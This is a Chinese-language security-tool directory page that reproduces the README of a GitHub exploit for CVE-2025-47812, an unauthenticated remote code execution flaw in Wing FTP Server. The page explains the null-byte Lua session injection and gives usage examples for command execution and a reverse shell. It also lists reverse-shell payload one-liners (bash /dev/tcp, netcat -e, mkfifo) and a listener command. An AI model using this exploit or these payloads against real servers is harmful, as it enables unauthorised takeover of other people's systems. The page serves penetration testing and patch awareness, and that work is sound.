Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-47812 — 针对 Wing FTP Server < 7.4.4 的未认证远程代码执行漏洞利用,通过会话文件中的 Lua 注入实现命令执行和反弹 Shell。 | Kitploit
工具/GitHubGitHub/blindma1den/cve-2025-47812
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育红队远程访问工具
GitHubblindma1den/cve-2025-47812

CVE-2025-47812

针对 Wing FTP Server < 7.4.4 的未认证远程代码执行漏洞利用,通过会话文件中的 Lua 注入实现命令执行和反弹 Shell。

查看仓库
171年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-47812 - Wing FTP服务器远程代码执行(RCE)

作者: blindma1den

日期: 2025年7月

漏洞利用类型: 远程代码执行(未认证)

目标: Wing FTP Server < 7.4.4

CVSS评分: 10.0(严重)


描述

此脚本利用CVE-2025-47812,这是Wing FTP服务器Web界面中的一个严重漏洞,允许远程攻击者在无需认证的情况下执行任意系统命令或打开反弹Shell。

该缺陷是由于登录表单(/loginok.html)中对空字节(%00)的处理不当造成的。这使得Lua代码能够被注入到会话文件中,随后在访问 /dir.html 等端点时被评估执行。


来源

NVD描述: https://nvd.nist.gov/vuln/detail/CVE-2025-47812


功能

  • 命令执行(例如 whoami、uname -a)
  • 多种反弹Shell载荷
  • 自动提取UID会话Cookie
  • 干净模块化的Python 3实现

依赖

  • Python 3.7+
  • requests模块

安装依赖:

pip install requests

用法

运行脚本:

python3 wingftp_rce_exploit.py

系统会提示你输入:

  • 目标URL(例如 http://127.0.0.1:5466)
  • 用户名(默认:anonymous)
  • 漏洞利用模式: [1] 执行命令 [2] 启动反弹Shell

示例

[1] 执行命令:

Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 1
Command to execute (default: whoami): whoami

[2] 反弹Shell:

Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 2
Reverse shell IP address: 192.168.1.100
Reverse shell port: 4444

在触发Shell之前启动你的监听器:

nc -lvnp 4444

使用的载荷(反弹Shell)

Bash: bash -i >& /dev/tcp/IP/PORT 0>&1

Python3: python3 -c 'import socket,subprocess,os; ...'

Netcat: nc IP PORT -e /bin/sh

PHP: php -r '$sock=fsockopen("IP",PORT); ...'

FIFO + Netcat: rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i ...


免责声明

此代码仅供教育目的。请勿将该漏洞利用于你不拥有或未经明确授权测试的系统。未经授权的使用是非法的、不道德的。

请立即修补你的系统。Wing FTP Server 7.4.4 已修复此漏洞。

祝你黑客愉快!

下载工具